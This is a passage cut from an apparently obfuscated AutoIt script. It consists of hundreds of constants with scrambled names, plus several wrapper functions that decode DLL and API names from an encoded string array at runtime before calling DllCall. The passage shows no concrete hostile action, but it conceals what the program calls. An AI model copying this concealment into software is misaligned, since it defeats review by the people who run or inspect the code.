  917. Global Const $a0c48a05749 = $a3c38a02206 & $a2948b03c17 & $a3538605c61
  918. Global Const $a3f48c04d35 = $a3c38a02206 & $a2248d02b44 & $a3538605c61 & $a1748e03902
  919. Global Const $a1e48f01f0b = $a3c38a02206 & $a3e58000d00
  920. Global Const $a1758103f5e = $a3c38a02206 & $a5f58200d3d & $a3538605c61
  921. Global Const $a4e58305a60 = $a3c38a02206 & $a2658402603 & $a3538605c61 & $a3558501a2b
  922. Global Const $a485860574e = $a4b58706161 & $a475880491e & $a5658903533
  923. Global Const $a0758a02e11 = $a1c58b01109
  924. Global Const $a6158c0572c = $a3658d01a12
  925. Global Const $a3b58e0063c = $a0e58f01b4a
  926. Global Const $a6068002e60 = $a5968101908
  927. Global Const $a0a68200e54 = $a2f68303d3e
  928. Global Const $a2768403f23 = $a0d68506034
  929. Global Const $a1868605c4b = $a0c68700e2c & $a0668805c2b
  930. Global Const $a5f6890114a = $a0068a02e5e
  931. Global Const $a5e68b01d31 = $a6168c03e02
  932. Global Const $a0f68d0200c = $a3c38a02206 & $a2e68e0484b
  933. Global Const $a1568f04a0b = $a3c38a02206 & $a1478002a36 & $a2a28e05730
  934. Global Const $a1178102356 = $a3c38a02206 & $a287820285b
  935. Global Const $a0378305d2b = $a4c78403715
  936. Global Const $a2978503020 = $a3c38a02206 & $a517860041d
  937. Global Const $a507870604d = $a2b78803155 & $a2928c0302e & $a237890312c
  938. Global Const $a3978a04850 = $a2928c0302e & $a0c78b00b60
  939. Global Const $a4678c0015d = $a0d78d00311 & $a2d78e0174c
  940. Global Const $a6278f00e4b = $a3c38a02206 & $a5788000f3e & $a4988100416
  941. Global Const $a2d88205056 = $a3c88301e40 & $a3c38a02206 & $a3488400d0b & $a2a28e05730 & $a2788504e17 & $a4588604463 & $a5988700108
  942. Global Const $a638880422e = $a3c38a02206 & $a5088900408 & $a4678c0015d
  943. Global Const $a5b88a03b30 = $a3c38a02206 & $a5e88b04540 & $a507870604d
  944. Global Const $a4a88c01519 = $a3c38a02206 & $a4188d05835
  945. Global Const $a1c88e0341f = $a3c38a02206 & $a5f88f02c59 & $a2928c0302e & $a1598005e32
  946. Global Const $a0898105801 = $a1e98203030 & $a3c38a02206 & $a3c98300f19
  947. Global Const $a0c9840051a = $a3c38a02206 & $a409850524f
  948. Global Const $a5a98603f5c = $a2b98705015 & $a2928c0302e & $a5c98801b14 & $a3538605c61 & $a0898905658 & $a2a28e05730 & $a3498a00b5b
  949. Global Const $a4498b00054 = $a0d98c03731 & $a3b98d05b3c & $a2898e04e39
  950. Global Const $a4198f00f4d = $a19a8000e47 & $a04a8104120 & $a44a8204155
  951. Global Const $a3ba8304762 = $a30a840403b & $a2fa8502560 & $a3aa860530c
  952. Global Const $a43a8702349 = $a3c38a02206 & $a2ba8803108 & $a3538605c61 & $a38a890062a
  953. Global Const $a52a8a04e4b = $a3c38a02206 & $a5ea8b0292d & $a41a8c05e00
  954. Global Const $a45a8d04648 = $a3c38a02206 & $a49a8e03733
  955. Global Const $a57a8f03548 = $a45b8003d0d & $a3c38a02206 & $a34b810282e
  956. Global Const $a33b8203f15 = $a22b8301c3f & $a2fb8402621
  957. Global Const $a5db8500837 = $a46b8604150 & $a33b8203f15 & $a3fb8703043
  958. Global Const $a23b880043a = $a3c38a02206 & $a43b890031a & $a48b8a0554f & $a31b8b01757 & $a45b8c02d06 & $a3fb8d03624 & $a4eb8e0411a
  959. Global Const $a11b8f0495e = $a1dc8005e56 & $a3c38a02206 & $a04c810631c & $a2a28e05730 & $a0ac8202d17 & $a47c8300514
  960. Global Const $a03c8401123 = $a3c38a02206 & $a5bc8505962 & $a33b8203f15
  961. Global Const $a44c860604e = $a3c38a02206 & $a3bc8704344
  962. Global Const $a2ac880145a = $a2928c0302e & $a12c890263f
  963. Global Const $a0ec8a04245 = $a4cc8b05b30 & $a3c38a02206 & $a12c8c06204
  964. Global Const $a42c8d05805 = $a3c38a02206 & $a08c8e0451f & $a2928c0302e & $a22c8f0245e
  965. Global Const $a2bd800142c = $a01d8101a61
  966. Global Const $a63d8200a21 = $a56d8303128 & $a2a28e05730
  967. Global Const $a42d8403161 = $a36d850560d
  968. Global Const $a3fd8601a13 = $a54d8701f48 & $a46d8802341
  969. Global Const $a52d8900602 = $a41d8a04846 & $a30d8b02123 & $a5fd8c0182f & $a2a28e05730 & $a04d8d03629
  970. Global Const $a4ad8e04d49 = $a3c38a02206 & $a27d8f01a3f
  971. Global Const $a2de8001e4a = $a3c38a02206 & $a55e8101354 & $a4be820310b & $a1be8302919
  972. Global Const $a50e8400c03 = $a3c38a02206 & $a3ae850545b
  973. Global Const $a29e8605744 = $a3c38a02206 & $a10e8704603 & $a2a28e05730 & $a43e8806206
  974. Global Const $a35e8901e25 = $a3c38a02206 & $a22e8a0612e & $a3fe8b00b1f & $a07e8c01631
  975. Global Const $a55e8d05722 = $a3fe8e05b16
  976. Global Const $a4ce8f0093a = $a3c38a02206 & $a34f800072a & $a24f8100323 & $a57f820280b & $a2a28e05730
  977. Global Const $a2df8300030 = $a3c38a02206 & $a32f8401c22
  978. Global Const $a00f8500c03 = $a46f8604446
  979. Global Const $a3ff870365a = $a28f880214e
  980. Global Const $a2cf8904e31 = $a06f8a05e42
  981. Global Const $a05f8b0500d = $a2af8c03d3e
  982. Global Const $a61f8d0260a = $a59f8e04e38 & $a21f8f04b05 & $a3e09004146 & $a4709103f2d
  983. Global Const $a0109204d04 = $a0d09302e5a & $a0f09405a44
  984. Global Const $a4209502805 = $a3309602742
  985. Global Const $a3509701e53 = $a0409801b0e
  986. Global Const $a4909900e0c = $a3509a01727
  987. Global Const $a0709b02255 = $a3f09c04336
  988. Global Const $a5609d03a07 = $a0c09e0274b
  989. Global Const $a2409f02f05 = $a1b1900054b & $a2a28e05730 & $a5b1910442c & $a4319206312
  990. Global Const $a3a1930301a = $a3f1940603b & $a1819501437
  991. Global Const $a0119600157 = $a0519705227
  992. Global Const $a3e19804502 = $a0619902b63
  993. Global Const $a6219a01319 = $a1f19b05a44 & $a0a19c0241f & $a5919d03411
  994. Global Const $a1619e02f15 = $a5c19f01327
  995. Global Const $a0d29001c18 = $a4529102a1f
  996. Global Const $a3d29204854 = $a3a29305f05 & $a5b29405d1a & $a5629503116 & $a412960444a
  997. Global Const $a3f29705f36 = Number($a4e2980373c)
  998. Global Const $a4329905562 = Number($a2d29a00b06)
  999. Global Const $a5129b04d42 = Number($a0429c01544)
  1000. Global Const $a5e29d0245b = Number($a2029e0385c)
  1001. Global Const $a3229f03b38 = Number($a1739003145)
  1002. Global Const $a0739101a62 = Number($a3939202c0d)
  1003. Global Const $a1b39301a16 = Number($a2c39405202)
  1004. Global Const $a4339502822 = Number($a0e39605e13)
  1005. Global Const $a5d39700709 = Number($a2a39801b35)
  1006. Global Const $a6039902e35 = Number($a5539a0550c)
  1007. Global Const $a4039b04659 = Number($a5439c03f0a)
  1008. Global Const $a4239d04913 = Number($a1f39e04a0e)
  1009. Global Const $a1a39f02f42 = Number($a164900591e)
  1010. Global Const $a4d49103a0a = Number($a3f49203747)
  1011. Global Const $a4949301731 = $a0c49405901
  1012. Global Const $a424950155a = $a3a4960015c
  1013. Global Const $a364970012d = $a004980190d
  1014. Global Const $a4e49903058 = $a1f49a0391f
  1015. Global Const $a2849b00c2f = $a6349c0371e
  1016. Global Const $a3349d0373a = $a0749e04951
  1017. Global Const $a4849f0423b = $a4b5900223b
  1018. Global Const $a3f59105f20 = $a2e59203716
  1019. Global Const $a0e59302d15 = $a525940342e
  1020. Global Const $a2859500400 = $a3859604323
  1021. Global Const $a3559706110 = $a0059801428
  1022. Global Const $a165990402f = $a2959a01d2e
  1023. Global Const $a5659b05f35 = $a3b59c03c2a
  1024. Global Const $a2159d00763 = $a1159e02e37
  1025. Global Const $a3759f00a3d = $a2269000702
  1026. Global Const $a266910040b = $a1f69205b44
  1027. Global Const $a4f69302e3f = $a156940500e
  1028. Global Const $a6169501250 = $a2c69605615
  1029. Global Const $a1069702726 = $a3569803c00
  1030. Global Const $a1f69903517 = $a1469a04863
  1031. Global Const $a5969b04706 = $a2069c00a12
  1032. Global Const $a4269d02041 = $a2169e0103d
  1033. Global Const $a1569f0194a = $a4779002e5f
  1034. Global Const $a2f79101c2a = $a1279201a3b
  1035. Global Const $a3f79302a57 = $a2679405c5c
  1036. Global Const $a2f7950280e = $a3a79605d1d
  1037. Global Const $a0a79705d47 = $a0579802f53
  1038. Global Const $a357990163d = $a4b79a03b21
  1039. Global Const $a4879b00a58 = $a2d79c02f55
  1040. Global Const $a4d79d02137 = $a2279e04462
  1041. Global Const $a2479f01130 = Number($a1689000b4b)
  1042. Global Const $a2a89100625 = Number($a2d89203222)
  1043. Global Const $a4489303b20 = Number($a4489404522)
  1044. Global Const $a5289503d29 = Number($a048960593f)
  1045. Global Const $a078970071a = Number($a3089803759)
  1046. Global Const $a5489903d52 = Number($a0a89a00003)
  1047. Global Const $a6089b04829 = Number($a3489c05937)
  1048. Global Const $a1e89d02148 = Number($a0789e00255)
  1049. Global Const $a0a89f02b52 = Number($a3d99006343)
  1050. Global Const $a0c99105037 = Number($a2b99202907)
  1051. Global Const $a2099301c2a = Number($a0b99404b44)
  1052. Global Const $a2499501a52 = Number($a2f99600f3f)
  1053. Global Const $a3299702c06 = Number($a1899804361)
  1054. Global Enum $a3699902138 = Number($a3399a05d59), $a1a99b02f49
  1055. Global Enum $a5b99c06148 = Number($a2999d00616), $a3b99e02350, $a2a99f04e1a, $a53a900034e
  1056. Global Enum $a37a9100058 = Number($a43a9204b15), $a14a9305513, $a25a9400640, $a4ba9502235, $a63a9606343, $a35a9705e2b, $a21a9803463, $a22a990593c, $a5ba9a00736, $a31a9b0274a, $a09a9c0454a, $a3ba9d0203f, $a42a9e0363d, $a49a9f02410, $a0fb9000c49, $a33b910452f, $a5cb9203a3b, $a23b9301e0b, $a15b940163b, $a45b9505f45, $a58b9602455, $a2bb9700030, $a5bb980480e, $a08b9902231, $a45b9a00408, $a5db9b04961, $a27b9c06057, $a54b9d04d59
  1057. Global Const $a01b9e03136 = Number($a0eb9f00a4e)
  1058. Global Const $a3ac9001a28 = Number($a02c9100312)
  1059. Global Const $a3cc920144d = Number($a48c9304e21)
  1060. Global Const $a17c9401a48 = Number($a25c9503429)
  1061. Global Const $a39c9601157 = Number($a11c970251c)
  1062. Global Const $a09c9804f35 = Number($a55c9902651)
  1063. Global Const $a2fc9a01b46 = Number($a0bc9b01b43)
  1064. Global Const $a0cc9c0431f = Number($a62c9d00a29)
  1065. Global Const $a38c9e03d0c = Number($a34c9f03b2c)
  1066. Global Const $a20d900384e = Number($a4cd9105a39)
  1067. Global Const $a50d920364b = Number($a2ad9304e0a)
  1068. Global Const $a16d9401d2a = Number($a3fd9501533)
  1069. Global Const $a16d9601535 = Number($a58d9701715)
  1070. Global Const $a1bd9804404 = Number($a1fd9906200)
  1071. Global Const $a3fd9a01947 = Number($a14d9b05e4a)
  1072. Global Const $a05d9c05b2b = Number($a11d9d03a45)
  1073. Global Const $a1dd9e0121f = Number($a49d9f0383d)
  1074. Global Const $a05e900550b = Number($a22e9103b2d)
  1075. Global Const $a10e9201d01 = Number($a01e930604f)
  1076. Global Const $a17e9405f4c = Number($a17e950614c)
  1077. Global Const $a4be9603709 = Number($a4ae970605b)
  1078. Global Const $a4ee980071e = Number($a3ee9903714)
  1079. Global Const $a44e9a0254c = Number($a61e9b00733)
  1080. Global Const $a1ae9c02039 = Number($a18e9d00849)
  1081. Global Const $a48e9e01e4b = Number($a5ee9f03c53)
  1082. Global Const $a37f9003e4b = Number($a35f9105b19)
  1083. Global Const $a12f920161f = Number($a4cf9302844)
  1084. Global Const $a10f9405816 = $a44e9a0254c
  1085. Global Const $a15f9500d41 = $a44e9a0254c
  1086. Global Const $a39f960605d = $a44e9a0254c
  1087. Global Const $a07f9704a16 = Number($a46f9800712)
  1088. Global Const $a1bf9904752 = Number($a4cf9a0375b)
  1089. Global Enum $a36f9b05d2d = Number($a41f9c0013d), $a1bf9d02f58, $a3af9e0314d, $a2df9f05157, $a190a003125, $a480a105c0c, $a330a202860
  1090. Global Enum $a440a302d4d = Number($a5b0a40035a), $a230a50243e, $a1b0a605106, $a2c0a702739, $a5d0a802234, $a530a904232, $a400aa01948, $a0c0ab05c4a, $a420ac04e50
  1091. Global Const $a3a0ad06232 = Number($a290ae03760)
  1092. Global Const $a2d0af0373a = Number($a301a004739)
  1093. Global Enum $a2b1a104c54 = Number($a611a20002f), $a501a302631, $a4d1a403711, $a1e1a500b5f, $a271a60375c, $a521a702528, $a621a80303a, $a401a904247, $a301aa05a62, $a0e1ab01860
  1094. Global Const $a561ac00703 = $a441ad00500
  1095. Global Const $a4a1ae04d36 = $a401af02060
  1096. Global Const $a4e2a005c3d = $a502a105643
  1097. Global Const $a1a2a201d33 = $a492a301934
  1098. Global Const $a212a403248 = $a182a500f32
  1099. Global Const $a5d2a603b5b = $a122a703a5c
  1100. Global Const $a0f2a80144b = $a4f2a90474e
  1101. Global Const $a632aa03e47 = $a092ab03f37
  1102. Global Const $a082ac00c33 = $a222ad0105b
  1103. Global Const $a322ae00410 = $a232af0361e
  1104. Global Const $a313a006051 = $a013a104318
  1105. Global Const $a0c3a205053 = $a3f3a300020
  1106. Global Const $a293a404053 = $a073a501743
  1107. Global Const $a563a600204 = $a063a70521f
  1108. Global Const $a483a802a56 = $a1c3a905518
  1109. Global Const $a573aa01b3c = $a193ab02c02
  1110. Global Const $a543ac0104b = $a3a3ad03716
  1111. Global Const $a3b3ae02723 = $a433af03246
  1112. Global Const $a3d4a004a06 = $a3b4a100248
  1113. Global Const $a574a200225 = $a464a30332e
  1114. Global Const $a064a402b24 = $a4a4a505945
  1115. Global Const $a1c4a601c0d = $a244a70583a
  1116. Global Const $a0a4a805d2e = $a0b4a905402
  1117. Global Const $a0d4aa00511 = $a1b4ab02001
  1118. Global Const $a134ac04551 = $a154ad00a4f
  1119. Global Const $a554ae00633 = $a1e4af0503f
  1120.  
  1121. Func a3e00102e0a($a3c5a002c5d = @error, $a4a5a101929 = @extended)
  1122.     If NOT IsDeclared("SSA3E00102E0A") Then
  1123.         Global $a3a5a30323f = a2b00005424($os[1132]), $a4a5a40180f = a2b00005424($os[1133]), $a085a504535 = a2b00005424($os[1134]), $a615a60481e = a2b00005424($os[1135])
  1124.         Global $ssa3e00102e0a = 1
  1125.     EndIf
  1126.     Local $a505a20190d = DllCall($a3a5a30323f, $a4a5a40180f, $a085a504535)
  1127.     Return SetError($a3c5a002c5d, $a4a5a101929, $a505a20190d[Number($a615a60481e)])
  1128. EndFunc
  1129.  
  1130. Func a5800200106($a4a5a70160f, $a3c5a002c5d = @error, $a4a5a101929 = @extended)
  1131.     If NOT IsDeclared("SSA5800200106") Then
  1132.         Global $a525a801335 = a2b00005424($os[1136]), $a0d5a90313e = a2b00005424($os[1137]), $a2a5aa05254 = a2b00005424($os[1138]), $a3f5ab00643 = a2b00005424($os[1139])
  1133.         Global $ssa5800200106 = 1
  1134.     EndIf
  1135.     DllCall($a525a801335, $a0d5a90313e, $a2a5aa05254, $a3f5ab00643, $a4a5a70160f)
  1136.     Return SetError($a3c5a002c5d, $a4a5a101929)
  1137. EndFunc
  1138.  
  1139. Global Const $a235ac05534 = Number($a055ad02c0e)
  1140. Global Const $a5a5ae04860 = Number($a3e5af00e51)
  1141. Global Const $a576a002850 = Number($a0c6a101b3e)
  1142. Global Const $a1e6a205625 = Number($a626a305f35)
  1143. Global Const $a446a400051 = Number($a1d6a503f37)
  1144. Global Const $a456a602d07 = Number($a376a700b0e)
  1145. Global Const $a056a805629 = Number($a246a900525)
  1146. Global Const $a5f6aa05a32 = Number($a086ab04139)
  1147. Global Const $a3d6ac01546 = Number($a3a6ad0315b)
  1148. Global Const $a0e6ae05b56 = Number($a2a6af0021b)
  1149. Global Const $a4d7a005c49 = Number($a2b7a101024)
  1150. Global Const $a267a202732 = Number($a437a304857)
  1151. Global Const $a127a401818 = Number($a1a7a504f05)
  1152. Global Const $a347a604023 = Number($a497a701d19)
  1153. Global Const $a067a801d48 = -Number($a307a903d11)
  1154. Global Const $a067aa00605 = Number($a1a7ab01e2a)
  1155. Global Const $a5e7ac04021 = Number($a487ad05115)
  1156. Global Const $a177ae05d18 = Number($a337af0311b)
  1157. Global Const $a3c8a000b53 = Number($a4a8a104117)
  1158. Global Const $a4b8a200a57 = Number($a0c8a300462)
  1159. Global Const $a188a400003 = Number($a328a503559)
  1160. Global Const $a0d8a603501 = Number($a368a702b4d)
  1161. Global Const $a138a806124 = Number($a018a90404b)
  1162. Global Const $a328aa01406 = Number($a4c8ab05e23)
  1163. Global Const $a5d8ac0283e = Number($a128ad04529)
  1164. Global Const $a298ae0001b = -Number($a318af0370e)
  1165. Global Const $a159a004061 = Number($a619a105258)
  1166. Global Const $a239a20601b = Number($a129a300d49)
  1167. Global Const $a0a9a40392c = Number($a039a504b2f)
  1168. Global Const $a239a60305b = Number($a409a705f36)
  1169. Global Const $a569a800b09 = Number($a339a90593a)
  1170. Global Const $a609aa05a57 = Number($a0f9ab00143)
  1171. Global Const $a1a9ac06217 = Number($a579ad03226)
  1172. Global Const $a329ae0583c = Number($a489af01151)
  1173. Global Const $a40aa005e0d = Number($a11aa10081c)
  1174. Global Const $a57aa204837 = Number($a35aa301e1a)
  1175. Global Const $a5faa403646 = Number($a01aa501600)
  1176. Global Const $a52aa603c0a = Number($a46aa700654)
  1177. Global Const $a56aa804f00 = Number($a29aa902d49)
  1178. Global Const $a41aaa04f26 = Number($a4daab04022)
  1179. Global Const $a32aac05926 = Number($a32aad05560)
  1180. Global Const $a58aae01327 = Number($a0aaaf01025)
  1181. Global Const $a0cba00464e = Number($a15ba103408)
  1182. Global Const $a34ba205f59 = Number($a13ba30564a)
  1183. Global Const $a5aba402b33 = Number($a57ba50381a)
  1184. Global Const $a31ba603a51 = Number($a5dba700261)
  1185. Global Const $a58ba805f30 = Number($a3cba90370c)
  1186. Global Const $a20baa02553 = Number($a63bab00a10)
  1187. Global Const $a2dbac03033 = Number($a45bad00508)
  1188. Global Const $a57bae0462a = Number($a4fbaf00013)
  1189.  
  1190. Func a3800302b40($a3eca000d54, $a2aca100d54, $a47ca20000b = 0, $a0fca303605 = 0, $a5cca403342 = 0, $a5fca500b3f = "wparam", $a3bca604d16 = "lparam", $a3dca702a2a = "lresult")
  1191.     If NOT IsDeclared("SSA3800302B40") Then
  1192.         Global $a2fca802746 = a2b00005424($os[1190]), $a25ca905f5c = a2b00005424($os[1191]), $a5ecaa0025f = a2b00005424($os[1192]), $a2ecab01317 = a2b00005424($os[1193]), $a41cac04e5e = a2b00005424($os[1194]), $a33cad03309 = a2b00005424($os[1195])
  1193.         Global $ssa3800302b40 = 1
  1194.     EndIf
  1195.     Local $a505a20190d = DllCall($a2fca802746, $a3dca702a2a, $a25ca905f5c, $a5ecaa0025f, $a3eca000d54, $a2ecab01317, $a2aca100d54, $a5fca500b3f, $a47ca20000b, $a3bca604d16, $a0fca303605)
  1196.     If @error Then Return SetError(@error, @extended, "")
  1197.     If $a5cca403342 >= Number($a41cac04e5e) AND $a5cca403342 <= Number($a33cad03309) Then Return $a505a20190d[$a5cca403342]
  1198.     Return $a505a20190d
  1199. EndFunc
  1200.  
  1201. Func a590040352a($a3eca000d54, $a2aca100d54, $a47ca20000b = 0, $a0fca303605 = 0, $a5cca403342 = 0, $a5fca500b3f = "wparam", $a3bca604d16 = "lparam", $a3dca702a2a = "lresult")
  1202.     If NOT IsDeclared("SSA590040352A") Then
  1203.         Global $a03cae05254 = a2b00005424($os[1196]), $a3bcaf00d22 = a2b00005424($os[1197]), $a28da005351 = a2b00005424($os[1198]), $a10da100518 = a2b00005424($os[1199]), $a34da200a1d = a2b00005424($os[1200]), $a07da302309 = a2b00005424($os[1201])
  1204.         Global $ssa590040352a = 1
  1205.     EndIf
  1206.     Local $a505a20190d = DllCall($a03cae05254, $a3dca702a2a, $a3bcaf00d22, $a28da005351, $a3eca000d54, $a10da100518, $a2aca100d54, $a5fca500b3f, $a47ca20000b, $a3bca604d16, $a0fca303605)
  1207.     If @error Then Return SetError(@error, @extended, "")
  1208.     If $a5cca403342 >= Number($a34da200a1d) AND $a5cca403342 <= Number($a07da302309) Then Return $a505a20190d[$a5cca403342]
  1209.     Return $a505a20190d
  1210. EndFunc
  1211.  
  1212. Global $a38da400343[Number($a3fda50050e)][Number($a20da605739)] = [[Number($a11da702e1c), Number($a48da800d37)]]
  1213. Global $a02da901c3e[Number($a05daa03440)][Number($a17dab01335)] = [[Number($a14dac02345), Number($a35dad0481c)]]
  1214. Global Const $a01dae0003d = Number($a2ddaf03519)
  1215. Global Const $a37ea00294b = Number($a47ea10291b)
  1216. Global Const $a2eea20115d = Number($a49ea304513)
  1217. Global Const $a27ea400a2e = Number($a57ea502843)
  1218. Global Const $a0dea601c1b = Number($a25ea70143d)
  1219. Global Const $a28ea802b26 = Number($a18ea904d61)
  1220. Global Const $a3beaa01949 = Number($a1aeab02450)
  1221. Global Const $a39eac02452 = Number($a3eead04d37)
  1222. Global Const $a44eae04122 = Number($a55eaf04438)
  1223. Global Const $a3cfa005a4a = Number($a4afa103d02)
  1224. Global Const $a10fa206106 = Ptr(-Number($a0bfa300918))
  1225. Global Const $a23fa404a21 = Ptr(-Number($a13fa504717))
  1226. Global Const $a3afa604a42 = -Number($a35fa70134b)
  1227. Global Const $a4cfa804609 = Number($a11fa904034)
  1228. Global Const $a17faa00034 = Number($a06fab04304)
  1229. Global Const $a0efac02722 = Number($a05fad04338)
  1230. Global Const $a5bfae04100 = Number($a61faf04a3f)
  1231. Global Const $a1c0b002514 = Number($a1b0b101d2e)
  1232. Global Const $a2a0b205f60 = Number($a350b30221c)
  1233. Global Const $a5d0b405825 = Number($a160b504440)
  1234. Global Const $a300b604005 = Number($a000b704f25)
  1235. Global Const $a1f0b80570d = Number($a340b906047)
  1236. Global Const $a3e0ba01e26 = Number($a2e0bb0431f)
  1237. Global Const $a420bc03863 = Number($a1c0bd01435)
  1238. Global Const $a370be02136 = Number($a410bf0542d)
  1239. Global Const $a591b002a00 = Number($a151b105425)
  1240. Global Const $a561b20472a = Number($a441b305456)
  1241. Global Const $a4a1b401634 = Number($a081b50203a)
  1242. Global Const $a411b60034b = Number($a281b70610b)
  1243. Global Const $a181b800332 = Number($a091b902226)
  1244. Global Const $a031ba02e3c = Number($a2b1bb05c0f)
  1245. Global Const $a541bc02f57 = Number($a3d1bd0554d)
  1246. Global Const $a131be0302a = Number($a0d1bf01d42)
  1247. Global Const $a0c2b000930 = Number($a362b100016)
  1248. Global Const $a0d2b200b20 = Number($a482b303121)
  1249. Global Const $a442b404435 = Number($a5c2b502b21)
  1250. Global Const $a022b60374f = Number($a482b702107)
  1251. Global Const $a0a2b800442 = $a541bc02f57
  1252. Global Const $a152b905158 = Number($a122ba03042)
  1253. Global Const $a542bb02a1c = Number($a4c2bc0201e)
  1254. Global Const $a532bd0072d = Number($a392be00700)
  1255. Global Const $a2d2bf01322 = Number($a3e3b000f4f)
  1256. Global Const $a423b101c14 = Number($a2a3b201101)
  1257. Global Const $a173b30395b = Number($a4c3b404e11)
  1258. Global Const $a3d3b50301c = Number($a073b603424)
  1259. Global Const $a513b703962 = Number($a523b805d16)
  1260. Global Const $a1e3b904861 = Number($a193ba0050e)
  1261. Global Const $a033bb01c57 = Number($a463bc00509)
  1262. Global Const $a213bd0344c = Number($a583be0584d)
  1263. Global Const $a003bf03507 = Number($a554b005c1b)
  1264. Global Const $a404b10600d = Number($a0d4b20402a)
  1265. Global Const $a624b303447 = Number($a554b401841)
  1266. Global Const $a454b502f27 = Number($a594b603d18)
  1267. Global Const $a5c4b703949 = Number($a154b803046)
  1268. Global Const $a094b900b61 = Number($a144ba0584e)
  1269. Global Const $a4b4bb0545f = Number($a5b4bc01b2c)
  1270. Global Const $a244bd05953 = Number($a184be0311c)
  1271. Global Const $a454bf02503 = Number($a275b003a2e)
  1272. Global Const $a135b101c16 = Number($a195b202e1f)
  1273. Global Const $a0d5b304e57 = Number($a135b40560f)
  1274. Global Const $a1a5b50604c = Number($a205b602643)
  1275. Global Const $a355b704418 = Number($a0d5b801d5c)
  1276. Global Const $a495b905102 = Number($a185ba02e48)
  1277. Global Const $a185bb01956 = Number($a235bc0355d)
  1278. Global Const $a475bd04537 = Number($a4e5be04248)
  1279. Global Const $a145bf0590c = Number($a536b00032b)
  1280. Global Const $a006b102142 = Number($a236b200f03)
  1281. Global Const $a056b30533c = Number($a4f6b40095e)
  1282. Global Const $a216b501535 = Number($a4c6b602509)
  1283. Global Const $a026b702c48 = -Number($a016b80554d)
  1284. Global Const $a1e6b904b3b = Number($a596ba04135)
  1285. Global Const $a446bb02c1d = Number($a406bc03415)
  1286. Global Const $a626bd00d4b = Number($a0d6be02e3e)
  1287. Global Const $a076bf05b52 = Number($a1a7b003e4c)
  1288. Global Const $a157b104b34 = Number($a1f7b205e33)
  1289. Global Const $a407b30215b = Number($a207b401c0e)
  1290. Global Const $a047b50104a = Number($a167b60122d)
  1291. Global Const $a1c7b702f1a = Number($a537b805b33)
  1292. Global Const $a067b90360e = BitShift($a407b30215b, Number($a097ba02c0f))
  1293. Global Const $a127bb05c57 = Number($a157bc0360d)
  1294. Global Const $a077bd05604 = BitShift($a047b50104a, Number($a417be03c58))
  1295. Global Const $a187bf04651 = BitShift($a1c7b702f1a, Number($a5d8b003947))
  1296. Global Const $a288b102a22 = Number($a228b200a02)
  1297. Global Const $a288b30392b = Number($a528b406143)
  1298. Global Const $a298b50373e = Number($a138b60043b)
  1299. Global Const $a108b701519 = Number($a3b8b802318)
  1300. Global Const $a618b904b38 = Number($a5f8ba0375c)
  1301. Global Const $a0e8bb00f44 = Number($a028bc03234)
  1302. Global Const $a278bd03e18 = Number($a5d8be05044)
  1303. Global Const $a1a8bf00234 = Number($a5a9b00012b)
  1304. Global Const $a549b105662 = Number($a0d9b20561a)
  1305. Global Const $a559b302408 = Number($a329b40422f)
  1306. Global Const $a529b504b0d = Number($a009b605452)
  1307. Global Const $a299b70093d = Number($a0b9b802b05)
  1308. Global Const $a129b901d12 = Number($a419ba02f24)
  1309. Global Const $a489bb01334 = Number($a229bc04f2e)
  1310. Global Const $a469bd0160d = Number($a4f9be02403)
  1311. Global Const $a039bf05120 = Number($a54ab004e3f)
  1312. Global Const $a3dab104e0b = Number($a0dab200c2b)
  1313. Global Const $a3bab304e1f = Number($a0fab401008)
  1314. Global Const $a59ab500d1b = Number($a1dab602b4e)
  1315. Global Const $a27ab70324b = Number($a48ab80552d)
  1316. Global Const $a56ab900309 = Number($a22aba01938)
  1317. Global Const $a44abb02735 = Number($a5cabc00f2a)
  1318. Global Const $a2dabd05c58 = Number($a26abe00c40)
  1319. Global Const $a0babf00e38 = Number($a29bb00501c)
  1320. Global Const $a5bbb104b36 = Number($a03bb20481d)
  1321. Global Const $a50bb306014 = Number($a27bb405a4e)
  1322. Global Const $a0cbb505c12 = Number($a16bb600e07)
  1323. Global Const $a0fbb702b1f = Number($a50bb802f13)
  1324. Global Const $a33bb903048 = Number($a52bba03810)
  1325. Global Const $a0fbbb0620f = Number($a10bbc0330f)
  1326. Global Const $a38bbd05901 = Number($a32bbe06005)
  1327. Global Const $a0ebbf02e03 = Number($a61cb001b53)
  1328. Global Const $a06cb103d63 = Number($a35cb205846)
  1329. Global Const $a0dcb30594c = $a2ccb404b5e & $a2928c0302e
  1330. Global Const $a11cb502024 = $a5acb604c0c
  1331. Global Const $a22cb702402 = $a3ecb800b40
  1332. Global Const $a52cb902d32 = $a51cba0532f
  1333. Global Const $a37cbb02f15 = $a2bcbc04823 & $a5fcbd04b27 & $a4dcbe02657
  1334.  
  1335. Func a4e00501e0c($a62cbf0122a = -1)
  1336.     If NOT IsDeclared("SSA4E00501E0C") Then
  1337.         Global $a49db006144 = a2b00005424($os[1331]), $a18db103b61 = a2b00005424($os[1332]), $a07db203f3f = a2b00005424($os[1333]), $a10db30331b = a2b00005424($os[1334]), $a18db402d2e = a2b00005424($os[1335])
  1338.         Global $ssa4e00501e0c = 1
  1339.     EndIf
  1340.     Local $a505a20190d = DllCall($a49db006144, $a18db103b61, $a07db203f3f, $a10db30331b, $a62cbf0122a)
  1341.     If @error Then Return SetError(@error, @extended, False)
  1342.     Return $a505a20190d[Number($a18db402d2e)]
  1343. EndFunc
  1344.  
  1345. Func a2000605923($a21db503d27, $a03db60320e, $a00db70123d)
  1346.     If NOT IsDeclared("SSA2000605923") Then
  1347.         Global $a23db802d16 = a2b00005424($os[1336]), $a56db904906 = a2b00005424($os[1337]), $a5edba00a2c = a2b00005424($os[1338]), $a0bdbb02001 = a2b00005424($os[1339]), $a4adbc01d18 = a2b00005424($os[1340]), $a4edbd00019 = a2b00005424($os[1341]), $a54dbe05e25 = a2b00005424($os[1342])
  1348.         Global $ssa2000605923 = 1
  1349.     EndIf
  1350.     Local $a505a20190d = DllCall($a23db802d16, $a56db904906, $a5edba00a2c, $a0bdbb02001, $a21db503d27, $a4adbc01d18, $a03db60320e, $a4edbd00019, $a00db70123d)
  1351.     If @error Then Return SetError(@error, @extended, False)
  1352.     Return $a505a20190d[Number($a54dbe05e25)]
  1353. EndFunc
  1354.  
  1355. Func a4900702e63($a3edbf02529 = 500, $a1aeb001159 = 1000)
  1356.     If NOT IsDeclared("SSA4900702E63") Then
  1357.         Global $a14eb10383d = a2b00005424($os[1343]), $a33eb205457 = a2b00005424($os[1344]), $a07eb301916 = a2b00005424($os[1345]), $a43eb40241a = a2b00005424($os[1346]), $a23eb505319 = a2b00005424($os[1347]), $a30eb601000 = a2b00005424($os[1348])
  1358.         Global $ssa4900702e63 = 1
